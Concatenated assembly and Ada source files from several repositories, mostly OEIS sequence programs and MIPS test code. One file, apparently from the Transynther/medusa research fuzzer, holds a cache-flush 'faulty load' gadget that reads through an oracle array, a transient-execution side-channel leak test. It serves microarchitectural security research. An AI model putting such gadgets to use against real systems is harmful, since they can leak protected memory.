(Set_Cunit); pragma Inline (Set_Cunit_Entity); pragma Inline (Set_Fatal_Error); pragma Inline (Set_Generate_Code); pragma Inline (Set_Has_RACW); pragma Inline (Set_Loading); pragma Inline (Set_Main_Priority); pragma Inline (Set_Unit_Name); pragma Inline (Source_Index); pragma Inline (Unit_File_Name); pragma Inline (Unit_Name); type Unit_Record is record Unit_File_Name : File_Name_Type; Unit_Name : Unit_Name_Type; Munit_Index : Nat; Expected_Unit : Unit_Name_Type; Source_Index : Source_File_Index; Cunit : Node_Id; Cunit_Entity : Entity_Id; Dependency_Num : Int; Fatal_Error : Boolean; Generate_Code : Boolean; Has_RACW : Boolean; Ident_String : Node_Id; Loading : Boolean; Main_Priority : Int; Serial_Number : Nat; Version : Word; Dynamic_Elab : Boolean; Error_Location : Source_Ptr; end record; package Units is new Table.Table ( Table_Component_Type => Unit_Record, Table_Index_Type => Unit_Number_Type, Table_Low_Bound => Main_Unit, Table_Initial => Alloc.Units_Initial, Table_Increment => Alloc.Units_Increment, Table_Name => "Units"); -- The following table stores strings from pragma Linker_Option lines type Linker_Option_Entry is record Option : String_Id; -- The string for the linker option line Unit : Unit_Number_Type; -- The unit from which the linker option comes end record; package Linker_Option_Lines is new Table.Table ( Table_Component_Type => Linker_Option_Entry, Table_Index_Type => Integer, Table_Low_Bound => 1, Table_Initial => Alloc.Linker_Option_Lines_Initial, Table_Increment => Alloc.Linker_Option_Lines_Increment, Table_Name => "Linker_Option_Lines"); -- The following table records the compilation switches used to compile -- the main unit. The table includes only switches and excludes -quiet, -- -dumpbase, and -o switches, since the latter are typically artifacts -- of the gcc/gnat1 interface. -- This table is set as part of the compiler argument scanning in -- Back_End. It can also be reset in -gnatc mode from the data in an -- existing ali file, and is read and written by the Tree_Read and -- Tree_Write routines for ASIS. package Compilation_Switches is new Table.Table ( Table_Component_Type => String_Ptr, Table_Index_Type => Nat, Table_Low_Bound => 1, Table_Initial => 30, Table_Increment => 100, Table_Name => "Compilation_Switches"); Load_Msg_Sloc : Source_Ptr; -- Location for placing error messages (a token in the main source text) -- This is set from Sloc (Enode) by Load only in the case where this Sloc -- is in the main source file. This ensures that not found messages and -- circular dependency messages reference the original with in this source. type Unit_Ref_Table is array (Pos range <>) of Unit_Number_Type; -- Type to hold list of indirect references to unit number table type Load_Stack_Entry is record Unit_Number : Unit_Number_Type; From_Limited_With : Boolean; end record; -- The Load_Stack table contains a list of unit numbers (indices into the -- unit table) of units being loaded on a single dependency chain, and a -- flag to indicate whether this unit is loaded through a limited_with -- clause. The First entry is the main unit. The second entry, if present -- is a unit on which the first unit depends, etc. This stack is used to -- generate error messages showing the dependency chain if a file is not -- found, or whether a true circular dependency exists. The Load_Unit -- function makes an entry in this table when it is called, and removes -- the entry just before it returns. package Load_Stack is new Table.Table ( Table_Component_Type => Load_Stack_Entry, Table_Index_Type => Nat, Table_Low_Bound => 0, Table_Initial => Alloc.Load_Stack_Initial, Table_Increment => Alloc.Load_Stack_Increment, Table_Name => "Load_Stack"); procedure Sort (Tbl : in out Unit_Ref_Table); -- This procedure sorts the given unit reference table in order of -- ascending unit names, where the ordering relation is as described -- by the comparison routines provided by package Uname. -- The Version_Ref table records Body_Version and Version attribute -- references. The entries are simply the strings for the external -- names that correspond to the referenced values. package Version_Ref is new Table.Table ( Table_Component_Type => String_Id, Table_Index_Type => Nat, Table_Low_Bound => 1, Table_Initial => 20, Table_Increment => 100, Table_Name => "Version_Ref"); end Lib;
oeis/139/A139292.asm
neoneye/loda-programs
11
1576
<filename>oeis/139/A139292.asm ; A139292: 2^(2p - 1)/8, where p is prime. ; 1,4,64,1024,262144,4194304,1073741824,17179869184,4398046511104,18014398509481984,288230376151711744,1180591620717411303424,302231454903657293676544,4835703278458516698824704 seq $0,6005 ; The odd prime numbers together with 1. trn $0,2 mov $2,4 pow $2,$0 mov $0,$2
P6/data_P6_2/MDTest101.asm
alxzzhou/BUAA_CO_2020
1
160750
<reponame>alxzzhou/BUAA_CO_2020<filename>P6/data_P6_2/MDTest101.asm ori $ra,$ra,0xf ori $4,$3,29030 srav $5,$5,$4 mflo $1 mfhi $0 mfhi $1 lui $0,32919 lui $5,13232 div $3,$ra mtlo $4 srav $4,$4,$6 addiu $4,$1,-20044 lui $4,34674 multu $4,$4 div $4,$ra divu $1,$ra sb $4,9($0) srav $3,$5,$3 addu $4,$4,$4 mfhi $4 mult $4,$4 sll $3,$1,5 sb $5,6($0) divu $2,$ra div $2,$ra srav $1,$3,$3 addiu $3,$2,-14235 srav $3,$2,$3 srav $4,$1,$4 mult $1,$3 div $4,$ra sb $3,7($0) sb $4,13($0) mthi $0 mtlo $3 ori $6,$6,10263 mtlo $5 lui $4,35379 sb $4,4($0) sll $5,$2,5 lui $1,37789 mfhi $4 divu $5,$ra divu $6,$ra div $0,$ra srav $3,$6,$3 mflo $1 lb $4,6($0) lb $6,16($0) srav $5,$4,$1 mult $4,$3 mult $1,$5 lb $4,8($0) mtlo $4 lui $4,45981 div $4,$ra multu $5,$5 sb $0,1($0) mult $4,$6 srav $6,$6,$0 ori $4,$4,32478 addiu $2,$2,124 mflo $4 divu $5,$ra lb $6,14($0) div $4,$ra multu $4,$4 srav $1,$4,$6 div $4,$ra sll $6,$1,12 divu $1,$ra mtlo $2 lui $6,46628 mtlo $0 divu $4,$ra addiu $4,$0,12515 lb $3,14($0) mfhi $2 sll $4,$3,7 divu $6,$ra divu $2,$ra lb $1,12($0) div $2,$ra addiu $5,$0,18377 addiu $4,$4,32182 multu $6,$2 sll $5,$5,25 lb $3,9($0) multu $4,$0 mflo $1 lb $4,7($0) srav $3,$1,$3 ori $4,$2,18335 mult $5,$0 ori $1,$4,39296 lb $5,6($0) addu $4,$1,$4 addiu $4,$1,2971 addiu $3,$4,-2916 mtlo $6 mfhi $1 mthi $4 mfhi $1 sll $1,$3,9 addiu $6,$2,-6034 mfhi $6 ori $1,$2,11360 divu $2,$ra addiu $3,$0,-10698 multu $4,$4 srav $4,$1,$2 mtlo $2 multu $0,$6 multu $4,$2 div $4,$ra divu $6,$ra div $4,$ra multu $4,$2 addu $1,$4,$4 div $5,$ra lui $5,52656 mult $4,$2 div $1,$ra addu $5,$1,$1 mthi $5 ori $4,$4,42482 multu $1,$2 mfhi $5 sb $0,1($0) addu $4,$0,$1 mfhi $1 sll $4,$3,23 mtlo $2 addiu $5,$5,-13932 mflo $4 mflo $4 mfhi $4 mtlo $6 srav $4,$4,$4 mfhi $5 lb $1,7($0) multu $5,$5 sll $3,$3,8 addiu $4,$1,-16236 addu $6,$6,$2 sb $1,11($0) sb $6,12($0) divu $2,$ra addu $6,$4,$4 mult $3,$4 mflo $5 addiu $5,$0,16060 mthi $5 sb $2,9($0) mtlo $5 mthi $4 lb $6,13($0) sll $5,$2,5 sb $6,14($0) sll $3,$4,6 sb $0,6($0) srav $6,$2,$1 lb $0,3($0) lb $5,13($0) lb $2,6($0) ori $5,$5,13299 mult $0,$0 ori $0,$2,31127 multu $2,$2 divu $1,$ra lui $4,781 sb $4,0($0) mfhi $5 divu $5,$ra mthi $4 div $5,$ra lb $4,3($0) lb $4,1($0) sll $4,$4,15 lui $6,18647 mult $6,$1 addu $0,$0,$0 addu $1,$1,$1 mfhi $4 divu $3,$ra mfhi $6 sll $5,$5,7 multu $5,$2 ori $1,$1,59897 mthi $4 mult $0,$5 lui $5,30999 divu $0,$ra mtlo $6 lb $6,1($0) mtlo $5 mthi $5 sb $4,13($0) sb $1,3($0) addu $6,$2,$4 addiu $1,$2,11576 addu $4,$4,$2 divu $1,$ra sll $6,$4,17 ori $6,$4,16419 sb $0,14($0) srav $0,$4,$0 addu $3,$4,$3 mult $1,$2 mflo $5 div $4,$ra mult $5,$1 lui $6,29835 div $3,$ra mfhi $3 mfhi $1 div $4,$ra mfhi $1 div $1,$ra multu $2,$2 mult $0,$5 addu $5,$5,$5 mtlo $5 mfhi $5 sb $4,6($0) lui $4,64080 div $1,$ra div $4,$ra divu $6,$ra lui $1,28836 multu $1,$4 lui $5,2673 sll $1,$2,8 addiu $6,$6,21984 addiu $0,$0,-1447 sll $4,$5,17 divu $4,$ra mult $1,$2 lui $4,48687 mtlo $6 sll $1,$1,12 mult $1,$1 ori $4,$4,57767 sll $6,$6,12 addu $1,$5,$3 mfhi $6 mthi $2 multu $3,$4 lb $4,3($0) sb $2,0($0) srav $5,$2,$2 srav $1,$5,$1 mflo $0 mflo $4 addu $0,$2,$3 mflo $4 mflo $2 addu $4,$4,$4 lb $2,13($0) div $6,$ra div $2,$ra divu $0,$ra addu $5,$2,$5 sb $5,11($0) div $1,$ra sll $4,$4,9 srav $5,$2,$3 mfhi $0 srav $2,$2,$4 sll $4,$4,20 ori $4,$5,8781 mtlo $5 sb $5,6($0) mflo $1 mfhi $3 mult $3,$0 ori $0,$5,44891 mfhi $1 srav $4,$2,$5 ori $6,$6,50149 addiu $2,$2,2281 addu $6,$6,$3 mult $4,$5 mthi $6 lui $4,34231 srav $1,$5,$4 mthi $3 lui $5,6678 ori $4,$5,34041 mtlo $6 srav $0,$4,$0 div $4,$ra addu $5,$4,$4 sb $3,10($0) sb $4,9($0) multu $1,$1 sb $1,2($0) sll $6,$6,17 div $5,$ra lb $5,6($0) mfhi $4 ori $4,$2,14630 mflo $4 addu $0,$0,$3 mthi $1 mult $6,$2 sll $0,$1,22 lui $1,31318 mflo $6 mflo $5 mtlo $1 mtlo $5 addiu $4,$4,30828 mult $2,$2 addu $3,$5,$3 mfhi $4 sb $2,5($0) ori $1,$4,13671 divu $5,$ra sll $4,$3,1 sll $5,$4,14 mflo $1 mtlo $5 addiu $1,$5,20383 mtlo $1 lb $1,13($0) mflo $3 srav $3,$4,$3 div $5,$ra sb $4,7($0) divu $1,$ra mflo $5 addiu $4,$1,24603 lui $6,5175 mthi $5 sb $4,5($0) mtlo $5 addiu $1,$5,-15873 lui $0,31084 lb $2,7($0) div $3,$ra mflo $6 ori $1,$2,54968 mflo $4 mult $5,$4 mthi $5 mflo $5 sb $5,13($0) mflo $3 mflo $1 lui $1,59737 lui $0,34513 addiu $5,$5,3880 divu $0,$ra multu $4,$3 addu $2,$2,$2 sb $1,6($0) lb $5,15($0) sll $1,$1,11 sb $3,14($0) lb $5,11($0) mflo $4 divu $4,$ra lui $1,22895 lui $4,12724 srav $3,$2,$3 addiu $4,$4,-27840 ori $4,$5,16678 addiu $2,$1,24538 mult $4,$1 div $4,$ra sb $5,13($0) srav $3,$5,$3 srav $4,$5,$5 div $4,$ra multu $5,$4 divu $3,$ra div $2,$ra mthi $0 mult $5,$2 mtlo $1 srav $3,$2,$3 addu $4,$4,$4 mflo $6 srav $4,$1,$3 addu $4,$2,$3 sll $4,$4,25 ori $1,$4,48868 addiu $0,$6,-17601 mflo $4 multu $4,$3 addiu $2,$2,18044 mtlo $5 mfhi $0 sll $1,$6,26 multu $4,$4 srav $4,$4,$2 mthi $1 srav $4,$4,$4 lui $1,46384 mtlo $5 mthi $4 div $4,$ra mflo $5 mthi $5 mtlo $1 srav $5,$5,$5 addiu $6,$1,4773 srav $4,$1,$5 addiu $1,$2,-20739 sb $1,3($0) ori $4,$3,40933 mult $0,$4 ori $4,$4,48675 divu $5,$ra mthi $5 mfhi $0 sll $0,$3,25 mthi $6 lb $1,9($0) lb $5,6($0) multu $3,$5 lui $4,2380 div $5,$ra sll $6,$4,12 ori $6,$6,10943 addu $3,$5,$3 sb $4,12($0) lb $4,0($0) sll $6,$4,25 mthi $3 mthi $5 sb $1,10($0) div $4,$ra mflo $5 mthi $2 sb $4,15($0) addu $0,$0,$0 srav $4,$6,$3 divu $6,$ra sb $1,11($0) sll $3,$2,7 sb $4,5($0) ori $3,$2,29065 div $3,$ra lb $4,14($0) mthi $5 mult $1,$5 srav $6,$2,$2 divu $4,$ra mult $3,$2 addu $5,$2,$4 srav $4,$1,$3 divu $6,$ra mtlo $6 mfhi $4 sb $6,6($0) sb $4,1($0) ori $5,$5,32969 srav $4,$1,$2 sb $4,3($0) multu $3,$4 srav $1,$0,$1 mflo $6 ori $4,$1,11816 divu $4,$ra multu $6,$5 multu $6,$6 addiu $6,$4,25831 mthi $6 mult $3,$3 multu $3,$1 div $0,$ra sb $4,9($0) divu $0,$ra ori $4,$4,47476 lb $1,12($0) mult $5,$4 ori $1,$3,48741 mult $5,$4 div $2,$ra sb $4,2($0) div $3,$ra mflo $5 ori $0,$2,29873 mflo $4 mthi $5 sb $1,14($0) mtlo $4 mtlo $5 divu $4,$ra mflo $5 multu $5,$4 addu $6,$2,$1 mult $5,$5 mult $3,$4 mult $6,$4 addu $6,$6,$6 sb $4,5($0) div $5,$ra mthi $5 mflo $4 sb $4,7($0) mtlo $6 mtlo $6 mtlo $1 lb $3,12($0) mult $1,$1 mflo $5 multu $0,$2 ori $4,$4,41479 ori $4,$4,44084 divu $0,$ra sll $5,$5,15 mthi $0 srav $4,$5,$2 mfhi $5 sb $2,1($0) multu $6,$6 sll $5,$4,9 mfhi $4 mult $4,$4 addu $4,$2,$3 addiu $4,$4,-25563 lb $1,6($0) mfhi $1 ori $1,$2,39719 lui $1,40052 addu $5,$1,$4 ori $0,$4,42613 sll $4,$2,11 mthi $1 srav $4,$4,$4 srav $3,$3,$3 div $4,$ra divu $5,$ra mthi $4 addu $3,$3,$3 divu $1,$ra multu $2,$4 ori $3,$3,29078 div $1,$ra mflo $4 addiu $3,$3,18153 mthi $5 lb $6,4($0) addiu $1,$4,6604 divu $4,$ra mtlo $1 ori $5,$5,44892 addiu $4,$3,22535 sll $5,$5,26 mult $1,$1 divu $5,$ra mfhi $1 mflo $6 srav $1,$1,$3 ori $1,$2,8277 lb $0,2($0) srav $2,$2,$2 mtlo $0 mfhi $5 lb $4,16($0) lb $6,4($0) mult $4,$0 mtlo $5 addiu $3,$3,-16169 mult $2,$2 addiu $5,$6,-31235 addu $5,$5,$1 addiu $2,$4,30229 ori $5,$2,63859 srav $5,$1,$4 mfhi $4 lui $1,12178 mflo $1 div $5,$ra mfhi $0 mfhi $1 addiu $5,$2,589 div $4,$ra mtlo $1 mfhi $4 lb $2,2($0) sll $0,$4,0 lui $2,36095 ori $4,$4,52653 mflo $4 multu $1,$4 sll $4,$4,3 sb $1,1($0) mfhi $4 mflo $2 lui $1,47216 sb $4,6($0) mthi $2 mthi $1 sb $1,14($0) mult $5,$3 mtlo $5 mult $3,$4 lui $1,63547 multu $5,$2 multu $1,$1 sb $1,8($0) lb $5,10($0) divu $0,$ra lui $5,34204 lb $5,5($0) mult $4,$2 div $4,$ra sb $3,13($0) ori $4,$2,18451 sb $2,13($0) mflo $5 lb $5,2($0) lb $3,12($0) sb $4,15($0) div $4,$ra divu $2,$ra sll $1,$1,3 multu $5,$5 mult $4,$2 addiu $4,$6,-3434 mtlo $0 lui $1,40135 mtlo $4 addu $4,$5,$4 addiu $4,$2,-8589 sll $4,$4,25 mflo $5 ori $0,$4,3758 sll $4,$5,0 addu $4,$0,$3 multu $4,$5 addu $5,$2,$4 multu $1,$5 mfhi $2 multu $4,$6 addiu $4,$2,3410 mtlo $1 mfhi $4 srav $1,$1,$1 ori $1,$5,39158 mfhi $4 sll $2,$1,16 sll $4,$0,28 sll $4,$4,9 mtlo $1 lui $1,55731 mthi $2 divu $1,$ra div $6,$ra sll $5,$0,30 lb $1,13($0) mflo $6 srav $4,$1,$1 mtlo $5 sb $4,4($0) mfhi $5 sll $4,$2,29 mfhi $4 sll $4,$4,16 mult $4,$5 addu $3,$3,$3 srav $5,$0,$4 divu $1,$ra sb $5,3($0) lb $2,13($0) lui $2,4357 mthi $4 ori $1,$6,14499 ori $4,$3,43483 mflo $1 sb $3,3($0) srav $3,$3,$3 srav $2,$4,$2 lui $1,27160 addu $5,$3,$3 sll $5,$5,16 multu $1,$1 div $1,$ra mult $5,$4 sll $4,$5,5 div $0,$ra ori $4,$6,37428 mult $0,$6 sb $1,2($0) mtlo $0 srav $3,$4,$3 div $6,$ra mtlo $5 lui $2,4001 multu $0,$2 multu $2,$1 divu $1,$ra mfhi $1 addiu $5,$5,-26326 mflo $4 lb $5,0($0) mtlo $0 ori $1,$1,53980 addiu $1,$1,31517 multu $0,$4 ori $1,$2,15734 mfhi $2 mtlo $0 div $1,$ra mtlo $1 sb $4,12($0) addu $3,$4,$3 addu $1,$1,$1 sb $6,15($0) lui $5,59756 addu $4,$2,$2 lb $4,2($0) mult $6,$0 mult $1,$1 sb $6,2($0) mfhi $3 ori $0,$3,54371 mflo $0 multu $4,$2 sb $5,5($0) div $3,$ra addiu $2,$5,-533 div $5,$ra ori $0,$3,29369 lb $4,11($0) mult $4,$5 ori $4,$4,43733 addu $0,$1,$2 sb $4,13($0) ori $4,$4,22811 mthi $0 sll $1,$4,30 multu $1,$1 divu $0,$ra sll $3,$3,15 sb $4,2($0) ori $4,$1,63938 srav $1,$1,$2 addiu $3,$2,3174 divu $1,$ra mthi $4 mthi $2 divu $6,$ra addiu $4,$6,29566 ori $3,$3,18130 srav $4,$5,$5 ori $1,$4,1862 ori $5,$5,41051 mflo $3 srav $6,$4,$1 lui $2,30574 mfhi $4 divu $4,$ra multu $5,$2 div $4,$ra sll $4,$2,26 addiu $4,$6,-31779 ori $1,$4,2269 addiu $4,$4,-3848 lb $4,8($0) addu $5,$0,$5 mtlo $6 div $1,$ra mult $4,$4 lb $5,3($0) mfhi $5 div $5,$ra lui $3,55599 srav $2,$2,$2 sll $4,$2,23 lb $1,8($0) ori $4,$4,55204 addiu $4,$6,-22545 mflo $0 srav $5,$2,$2 addu $1,$4,$4 addiu $2,$2,-32205 mflo $3 sll $4,$5,0 mfhi $5 mthi $4 ori $4,$5,32017 srav $0,$4,$0 mult $4,$0 divu $0,$ra multu $3,$6 div $5,$ra mthi $1 srav $1,$1,$3 mult $0,$2 lui $4,9193 mflo $4 lb $2,1($0) mthi $2 lb $5,11($0) div $2,$ra mflo $6 ori $1,$4,8743 mult $2,$2 mult $2,$2 lb $5,6($0) srav $5,$4,$4 mflo $1 sll $0,$1,7 addiu $0,$5,-28034 sb $5,13($0) mflo $5 mult $5,$2 ori $1,$5,40369 divu $5,$ra sb $1,3($0) lb $4,7($0) addu $4,$4,$5 addiu $1,$0,-23171 addu $0,$1,$0 multu $1,$4 lb $5,0($0) mflo $1 mflo $0 div $5,$ra mult $1,$4 mult $3,$0 divu $2,$ra sll $4,$2,4 addiu $5,$5,-25490 sb $6,1($0) mtlo $6 sb $4,10($0) divu $5,$ra addiu $1,$4,25097 lui $2,36023 lui $1,5171 mult $1,$1 ori $5,$2,56164 sll $2,$2,26 sb $6,10($0) srav $4,$1,$1 lui $0,18733 addiu $4,$2,-11935 srav $4,$4,$2 div $5,$ra sb $1,7($0) addiu $5,$2,-27451 div $5,$ra mult $1,$2 mflo $2 lb $2,9($0) div $4,$ra lb $0,10($0) ori $6,$0,11888 mult $6,$5 lb $4,9($0) sb $4,7($0) sll $5,$4,6 addiu $1,$4,-19285 mtlo $1 lui $1,43772 mflo $5 mthi $4 sb $1,13($0) sll $4,$4,17 sb $2,10($0) mthi $1 lui $0,63074 mfhi $4 ori $6,$6,60759 srav $1,$2,$4 mtlo $5 lui $1,45857 div $1,$ra lb $1,1($0) mthi $1 divu $1,$ra mtlo $6 lui $4,47084 div $3,$ra multu $2,$2 mtlo $5 lb $5,5($0) ori $1,$0,45125 ori $0,$5,5673 divu $4,$ra sll $1,$4,25 sb $4,8($0) divu $5,$ra
standalone/pruntime/rizin/binrz/preload/trap-linux-x86-32.asm
ndkazu/guessNumber-vs-Bot
0
88988
.os linux .arch x86 .bits 32 mov eax, $sys.getpid int 0x80 mov ebx, $sys.kill xchg eax, ebx int 0x80
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1944.asm
ljhsiun2/medusa
9
81385
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r15 push %r8 push %r9 push %rcx push %rdi push %rdx push %rsi lea addresses_WC_ht+0x5bed, %rsi lea addresses_D_ht+0xa05, %rdi nop nop nop nop nop cmp $9334, %r9 mov $50, %rcx rep movsb nop dec %r10 lea addresses_UC_ht+0x9c20, %r15 clflush (%r15) nop nop add $28875, %rdi mov (%r15), %r9d nop nop nop nop sub $33543, %r10 lea addresses_A_ht+0x1a8e5, %rcx xor $17584, %r8 mov $0x6162636465666768, %rdi movq %rdi, %xmm7 vmovups %ymm7, (%rcx) sub $12063, %rcx lea addresses_A_ht+0x126ed, %rdi sub $56847, %r9 mov (%rdi), %rsi nop lfence lea addresses_WC_ht+0x128d5, %r9 nop nop nop sub %r10, %r10 movups (%r9), %xmm3 vpextrq $1, %xmm3, %r8 nop nop nop cmp %r9, %r9 lea addresses_A_ht+0x1a8cd, %rcx nop nop nop nop add %r9, %r9 movb (%rcx), %r15b nop nop nop dec %r15 lea addresses_D_ht+0x3b31, %r9 clflush (%r9) nop nop nop add $5662, %rdi mov $0x6162636465666768, %rcx movq %rcx, %xmm7 vmovups %ymm7, (%r9) nop and %rdi, %rdi lea addresses_UC_ht+0x14b07, %rsi lea addresses_normal_ht+0x20ed, %rdi clflush (%rsi) nop and %rdx, %rdx mov $58, %rcx rep movsb nop nop nop cmp $22556, %rdi lea addresses_WC_ht+0x3aed, %r10 clflush (%r10) nop cmp $44833, %rsi movb $0x61, (%r10) nop nop nop and %r8, %r8 lea addresses_UC_ht+0x1bded, %rsi lea addresses_A_ht+0xb2df, %rdi clflush (%rsi) xor %r8, %r8 mov $46, %rcx rep movsq nop nop nop sub %r10, %r10 lea addresses_WT_ht+0xaaed, %rdx nop nop nop nop add $63942, %r15 and $0xffffffffffffffc0, %rdx movntdqa (%rdx), %xmm4 vpextrq $0, %xmm4, %r8 add $64144, %r10 lea addresses_WT_ht+0x1c62d, %rdi nop nop inc %rdx mov $0x6162636465666768, %r10 movq %r10, %xmm1 movups %xmm1, (%rdi) nop nop cmp %rsi, %rsi pop %rsi pop %rdx pop %rdi pop %rcx pop %r9 pop %r8 pop %r15 pop %r10 ret .global s_faulty_load s_faulty_load: push %r13 push %r8 push %rbp push %rbx push %rdx // Faulty Load lea addresses_UC+0x32ed, %rbp clflush (%rbp) nop and %r8, %r8 mov (%rbp), %rbx lea oracles, %rdx and $0xff, %rbx shlq $12, %rbx mov (%rdx,%rbx,1), %rbx pop %rdx pop %rbx pop %rbp pop %r8 pop %r13 ret /* <gen_faulty_load> [REF] {'src': {'NT': True, 'AVXalign': False, 'size': 1, 'congruent': 0, 'same': False, 'type': 'addresses_UC'}, 'OP': 'LOAD'} [Faulty Load] {'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 0, 'same': True, 'type': 'addresses_UC'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'congruent': 6, 'same': False, 'type': 'addresses_WC_ht'}, 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'} {'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'STOR'} {'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 8, 'same': True, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'} {'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 3, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'} {'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 5, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'STOR'} {'src': {'congruent': 1, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 7, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM'} {'dst': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 9, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'STOR'} {'src': {'congruent': 7, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 0, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'} {'src': {'NT': True, 'AVXalign': False, 'size': 16, 'congruent': 11, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 5, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'STOR'} {'37': 21829} 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 */
oeis/203/A203579.asm
neoneye/loda-programs
11
19016
; A203579: Exponential (or binomial) convolution of A000032 (Lucas) with itself, divided by 2. ; Submitted by <NAME> ; 2,2,7,17,57,177,577,1857,6017,19457,62977,203777,659457,2134017,6905857,22347777,72318977,234029057,757334017,2450784257,7930904577,25664946177,83053510657,268766806017,869747654657,2814562533377,9108115685377,29474481504257,95381425750017,308660777517057,998847258034177,3232337626136577,10460064284409857,33849479073366017,109539215284371457,354476346862206977,1147109554861899777,3712124497172627457,12012687213792854017,38873872416276217857,125798493687723851777,407092477040552574977 mov $3,1 lpb $0 sub $0,1 mov $2,$3 mul $2,5 add $3,$1 add $1,$2 lpe mov $0,$3 add $0,1
oeis/094/A094431.asm
neoneye/loda-programs
11
81142
; A094431: a(n) = left term in M^n * [1 0 0], where M = the 3 X 3 matrix [1 -1 0 / -1 4 -3 / 0 -3 3]. ; Submitted by <NAME>(s2) ; 1,2,7,38,241,1586,10519,69878,464353,3085922,20508199,136292294,905764561,6019485842,40004005687,265856672918,1766817332161,11741828601026,78033272818759,518589725140838,3446418345757873 mov $1,1 mov $2,3 lpb $0 sub $0,1 sub $2,$1 sub $2,$1 add $1,$2 mul $2,9 lpe mov $0,$1
